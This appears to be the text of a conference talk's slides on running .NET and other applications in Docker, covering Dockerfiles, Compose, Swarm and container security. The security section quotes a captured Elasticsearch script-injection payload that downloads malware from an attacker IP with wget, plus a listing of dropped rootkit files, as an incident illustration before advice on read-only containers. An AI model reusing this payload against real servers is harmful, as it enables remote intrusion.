Running .NET on Docker

@Ben_Hall

Ben@BenHall.me.uk
Ocelot Uproar / Katacoda.com

@Ben_Hall / Blog.BenHall.me.uk

WHO AM I?

Learn via Interactive Browser-Based Labs
Katacoda.com

Agenda

• Getting started with Docker
• Windows Containers vs Linux Containers
• Building .NET applications as containers
• Deploying containers
• The future

doger.io

https://www.docker.com/whatisdocker/

Container

Own Process Space
Own Network Interface
Own Root Directories

Sandboxed

Like a lightweight VM. But it’s not a VM.

Container

Native CPU
Native Memory
Native IO

No Pre-Allocation
No Performance Overhead

Container

Milliseconds to launch

Docker - An open platform for distributed applications for developers and sysadmins.

Got us to agree on something!

Batteries included but removable

> docker run -p 6379:6379 redis:3.0.3

[Redis ASCII-art startup banner: Redis 3.0.3 (00000000/0) 64 bit, Running in standalone mode, Port: 6379, PID: 1, http://redis.io]

1:M 05 Nov 10:42:24.402 # Server started, Redis version 3.0.3
1:M 05 Nov 10:42:24.402 # WARNING overcommit_memory is set to 0! Background save may fail under low memory condition. To fix this issue add 'vm.overcommit_memory = 1' to /etc/sysctl.conf and then reboot or run the command 'sysctl vm.overcommit_memory=1' for this to take effect.
1:M 05 Nov 10:42:24.402 # WARNING you have Transparent Huge Pages (THP) support enabled in your kernel. This will create latency and memory usage issues with Redis. To fix this issue run the command 'echo never > /sys/kernel/mm/transparent_hugepage/enabled' as root, and add it to your /etc/rc.local in order to retain the setting after a reboot. Redis must be restarted after THP is disabled.
1:M 05 Nov 10:42:24.403 # WARNING: The TCP backlog setting of 511 cannot be enforced because /proc/sys/net/core/somaxconn is set to the lower value of 128.
1:M 05 Nov 10:42:24.403 * The server is now ready to accept connections on port 6379

Installing on OSX / Windows

https://www.docker.com/getdocker

Installing In Production

curl -sSL https://get.docker.com/ | sh

Very Simple Host

A computer station that runs the Docker daemon

Windows Containers, Linux Containers

Kernel Virtualisation

Base Image

Linux Containers

• Centos, Ubuntu, Alpine

• Binaries built for Linux kernel

Windows Containers

• Windows Server Core, Windows Nano

• Binaries built for Windows

Building Docker Containers

https://www.katacoda.com/courses/dotnet-in-docker/deploying-aspnet-core-as-docker-container

$ cat Dockerfile-linux
FROM microsoft/dotnet:1.0.0-preview2-sdk

RUN mkdir /app
WORKDIR /app

# Copy project.json first so the restore layer stays cached until dependencies change
COPY project.json /app
RUN ["dotnet", "restore"]

COPY . /app
RUN ["dotnet", "build"]

EXPOSE 5000/tcp
CMD ["dotnet", "run"]

$ docker build -t aspnet-app:v0.1 .

$ docker run -d \
    -t -p 5000:5000 \
    --name app \
    aspnet-app:v0.1

$ type Dockerfile-windows

FROM microsoft/iis:windowsservercore-10.0.14393.693
SHELL ["powershell", "-command"]

RUN Install-WindowsFeature NET-Framework-45-ASPNET; Install-WindowsFeature Web-Asp-Net45

RUN Remove-Website -Name 'Default Web Site'; \
    mkdir c:\NerdDinner; \
    New-Website -Name 'nerd-dinner' \
                -Port 80 -PhysicalPath 'c:\NerdDinner' \
                -ApplicationPool '.NET v4.5'

EXPOSE 80

COPY NerdDinner c:\NerdDinner

> cat Dockerfile
FROM node:6

RUN mkdir -p /usr/src/app
WORKDIR /usr/src/app

COPY . /usr/src/app
RUN npm install

CMD [ "npm", "start" ]

> docker build -t nodeapp .

> docker run -d -p 3000 nodeapp

Visual Studio Integration

Debugging Node.js with VS Code

EXPOSE 3000
EXPOSE 5858
CMD ["node", "--debug=5858", "index.js"]

docker run -d -p 3000:3000 -p 5858:5858 nodeapp

Docker in Production

Containers can’t fix broken architectures.

But they can help…

Production isn’t special

Just another environment

Immutable
Disposable Container Pattern

Docker Compose

> docker-compose up -d
> cat docker-compose.yml

web:
  image: ocelotuproar/katacoda
  volumes:
    - /opt/projects/katacoda/data:/usr/src/app/data
    - /opt/docker/katacoda/db:/usr/src/app/ocelite-db
    - /var/run/docker.sock:/var/run/docker.sock
  ports:
    - 3000
  environment:
    VIRTUAL_HOST: 'katacoda.com,*.katacoda.com'
    NODE_ENV: 'production'
  restart: always

// Production version of docker-compose-dev.yml

> docker-compose up -d   # up: start containers, -d: in background
Recreating katacoda_nginx_1...
Recreating katacoda_redis_1...
Recreating katacoda_db_1...
Recreating katacoda_elasticsearch_1...
Recreating katacoda_web_1...

> docker-compose stop   # Stop containers
Stopping katacoda_web_1...
Stopping katacoda_elasticsearch_1...
Stopping katacoda_db_1...
Stopping katacoda_redis_1...
Stopping katacoda_nginx_1...

Swarm

• https://www.katacoda.com/courses/docker-orchestration/

$ docker service create \
    --name http \
    --network skynet \
    --replicas 2 \
    -p 80:80 \
    katacoda/docker-http-server

Constraint Scheduler

$ docker run \
    -e constraint:ostypelabel==windowscompat \
    windowservercore cmd

$ docker run \
    -e constraint:ostypelabel==linuxcompat \
    ubuntu bash

Microsoft, Apprenda, Red Hat

https://github.com/kubernetes/kubernetes/issues/22623

Common Question: Is it secure?

Hosting provider becomes unhappy

org.elasticsearch.search.SearchParseException: [index][3]: query[ConstantScore(*:*)],from[-1],size[1]: Parse Failure [Failed to parse source [{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"script":"import java.util.*;\nimport java.io.*;\nString str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"wget -O /tmp/xdvi http://<IP Address>:9985/xdvi\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();"}}}]]

http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/

C /bin
C /bin/netstat
C /bin/ps
C /bin/ss
C /etc
C /etc/init.d
A /etc/init.d/DbSecuritySpt
A /etc/init.d/selinux
C /etc/rc1.d
A /etc/rc1.d/S97DbSecuritySpt
A /etc/rc1.d/S99selinux
C /etc/rc2.d
A /etc/rc2.d/S97DbSecuritySpt
A /etc/rc2.d/S99selinux
C /etc/rc3.d
A /etc/rc3.d/S97DbSecuritySpt
A /etc/rc3.d/S99selinux
C /etc/rc4.d
A /etc/rc4.d/S97DbSecuritySpt
A /etc/rc4.d/S99selinux
C /etc/rc5.d

A /etc/rc5.d/S97DbSecuritySpt
A /etc/rc5.d/S99selinux
C /etc/ssh
A /etc/ssh/bfgffa
A /os6
A /safe64
C /tmp
A /tmp/.Mm2
A /tmp/64
A /tmp/6Sxx
A /tmp/6Ubb
A /tmp/DDos99
A /tmp/cmd.n
A /tmp/conf.n
A /tmp/ddos8
A /tmp/dp25
A /tmp/frcc
A /tmp/gates.lod
A /tmp/hkddos
A /tmp/hsperfdata_root
A /tmp/linux32
A /tmp/linux64
A /tmp/manager
A /tmp/moni.lod
A /tmp/nb
A /tmp/o32
A /tmp/oba
A /tmp/okml
A /tmp/oni
A /tmp/yn25
C /usr
C /usr/bin
A /usr/bin/.sshd
A /usr/bin/dpkgd
A /usr/bin/dpkgd/netstat
A /usr/bin/dpkgd/ps
A /usr/bin/dpkgd/ss

Read Only Containers

> docker run --read-only \
    -v /data:/data \
    elasticsearch
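
Added example (not from the talk): a Python triage of `docker diff` output like the listing above, run over a constructed subset of those lines. The rule table and the `/data` writable path (taken from the `-v /data:/data` flag) are assumptions of the example; it labels each change and marks whether a read-only root filesystem would have refused the write.

```python
import re
from collections import Counter

# Constructed sample: a subset of the `docker diff` lines shown above.
SAMPLE_DIFF = """\
C /bin
C /bin/netstat
C /bin/ps
C /bin/ss
A /etc/init.d/DbSecuritySpt
A /etc/rc1.d/S97DbSecuritySpt
A /etc/ssh/bfgffa
A /tmp/linux64
A /usr/bin/.sshd
A /usr/bin/dpkgd/ps
"""

# Assumed triage rules for this example; the first matching pattern wins.
RULES = [
    (re.compile(r"^/etc/(init\.d|rc\d\.d)/"), "boot persistence"),
    (re.compile(r"^/(usr/)?s?bin/"), "system binary"),
    (re.compile(r"^/etc/ssh/"), "ssh configuration"),
    (re.compile(r"^/tmp/"), "dropped file"),
]

def parse_diff(text):
    """Yield (kind, path) per line; kind is A (added), C (changed) or D (deleted)."""
    for line in text.splitlines():
        kind, _, path = line.strip().partition(" ")
        if kind in ("A", "C", "D") and path.startswith("/"):
            yield kind, path

def triage(text, writable=("/data",)):
    """Return (kind, path, label, blocked); blocked = outside the writable mounts."""
    findings = []
    for kind, path in parse_diff(text):
        label = next((name for rx, name in RULES if rx.search(path)), None)
        if label is None:
            continue  # e.g. parent directories that are only marked "C"
        blocked = not any(path == w or path.startswith(w + "/") for w in writable)
        findings.append((kind, path, label, blocked))
    return findings

def summary(text, writable=("/data",)):
    return Counter(label for _, _, label, _ in triage(text, writable))

if __name__ == "__main__":
    for kind, path, label, blocked in triage(SAMPLE_DIFF):
        print(f"{kind} {path:30} {label:18} blocked by --read-only: {blocked}")
```

Changes under a mounted volume do not appear in `docker diff`, so the writable paths left open by `-v` need their own monitoring.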

Is Docker Secure?

• Yes. It’s as secure as your practices are.
• ElasticSearch hack would have taken over entire box
• New game, new rules to play by

Your local machine is now the same as production

The Future?

Docker + Windows

Microsoft

SQL Server as a Container

Visual Studio as a Container?

RStudio

• docker run -d -p 8787:8787 rocker/rstudio

Docker + Desktop Applications

https://blog.jessfraz.com/post/docker-containers-on-the-desktop/

It’s amazing, but a little confusing.

$ docker run -it \
    -v /etc/localtime:/etc/localtime \
    -v /tmp/.X11-unix:/tmp/.X11-unix \
    -e DISPLAY=unix$DISPLAY \
    --device /dev/snd \
    --link pulseaudio:pulseaudio \
    -e PULSE_SERVER=pulseaudio \
    --device /dev/video0 \
    --name skype \
    jess/skype

http://www.katacoda.com/

Thank you!

@Ben_Hall
Ben@BenHall.me.uk
Blog.BenHall.me.uk

www.Katacoda.com
